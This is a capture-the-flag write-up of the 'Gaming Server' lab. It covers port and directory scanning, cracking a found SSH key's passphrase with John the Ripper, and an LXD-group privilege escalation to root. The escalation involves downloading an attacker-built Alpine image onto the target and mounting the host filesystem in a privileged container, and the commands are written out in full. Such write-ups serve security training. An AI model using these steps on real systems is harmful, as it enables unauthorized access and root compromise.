Gaming Server

Date: 11 November, 2021

Author: Dhaval Kotak

Port Scanning

nanomite @ zeus in ~/thm/gaming_server
⚡️ nmap 10.10.19.112 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 22:21 IST
Nmap scan report for 10.10.19.112
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds

Gobuster Scanning

nanomite @ zeus in ~/thm/gaming_server
⚡️ gobuster dir -u http://10.10.19.112 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.19.112
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/11 22:22:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 2762]
/robots.txt           (Status: 200) [Size: 33]  
/secret               (Status: 301) [Size: 313] [--> http://10.10.19.112/secret/]
/server-status        (Status: 403) [Size: 277]                                  
/uploads              (Status: 301) [Size: 314] [--> http://10.10.19.112/uploads/]
           
===============================================================
2021/11/11 22:24:36 Finished
===============================================================

Getting SSH Credentials

Username

We find the username john in the page source

RSA Key

There is a RSA key in the secret directory we discovered by gobuster.
We can use ssh2John and then JohnTheRipper itself to get the passphrase for getting the ssh login.

nanomite @ zeus in ~/thm/gaming_server
⚡️ python /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/gaming_server
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (id_rsa)
1g 0:00:00:06 71.47% (ETA: 22:29:46) 0.1658g/s 1697Kp/s 1697Kc/s 1697KC/s alfaris
Session aborted

Now we can log in as john using ssh credentials we found.
And we get the user.txt right away

nanomite @ zeus in ~/thm/gaming_server
⚡️ ssh john@10.10.19.112 -i id_rsa                      
The authenticity of host '10.10.19.112 (10.10.19.112)' can't be established.
ECDSA key fingerprint is SHA256:LO5bYqjXqLnB39jxUzFMiOaZ1YnyFGGXUmf1edL6R9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.112' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov 11 17:05:39 UTC 2021

  System load:  0.0               Processes:           97
  Usage of /:   41.1% of 9.78GB   Users logged in:     0
  Memory usage: 32%               IP address for eth0: 10.10.19.112
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt 
a5c2ff8b9c(REDACTED)ff2f1a5a6e7e

What is the user flag?
a5c2ff8b9c(REDACTED)ff2f1a5a6e7e

Privilege Escalation

Our uid is a member of lxd group which is a linux container.

john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip
),46(plugdev),108(lxd)

We can download alphine builder on our local machine, which provides a way to create Alpine Linux images, so we can mount it using LXD.

First clone the repository in your machine and then run the alpine builder script as root in order to build the image as a tar file

nanomite @ zeus in ~/thm/gaming_server
⚡️ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 42, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 42 (delta 5), reused 4 (delta 1), pack-reused 27
Receiving objects: 100% (42/42), 3.11 MiB | 650.00 KiB/s, done.
Resolving deltas: 100% (11/11), done.
nanomite @ zeus in ~/thm/gaming_server
⚡️ cd lxd-alpine-builder 
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master
⚡️ sudo ./build-alpine

Now start a server to transfer the files from your attacker machine to the target machine

// Your Machine
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master*
⚡️ python3 -m http.server 5000                          
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...

// Target Machine
john@exploitable:~$ wget 10.17.14.25:5000/alpine-v3.13-x86_64-20210218_0139.tar.gz/

Now import the image

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage

Then spawn the root shell by running the following commands:

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

After that we can find the root flag and read it.

What is the root flag?
2e337b8c9f(REDACTED)8d4e6a7c88fc

PreviousPickle Rick

Last updated 4 years ago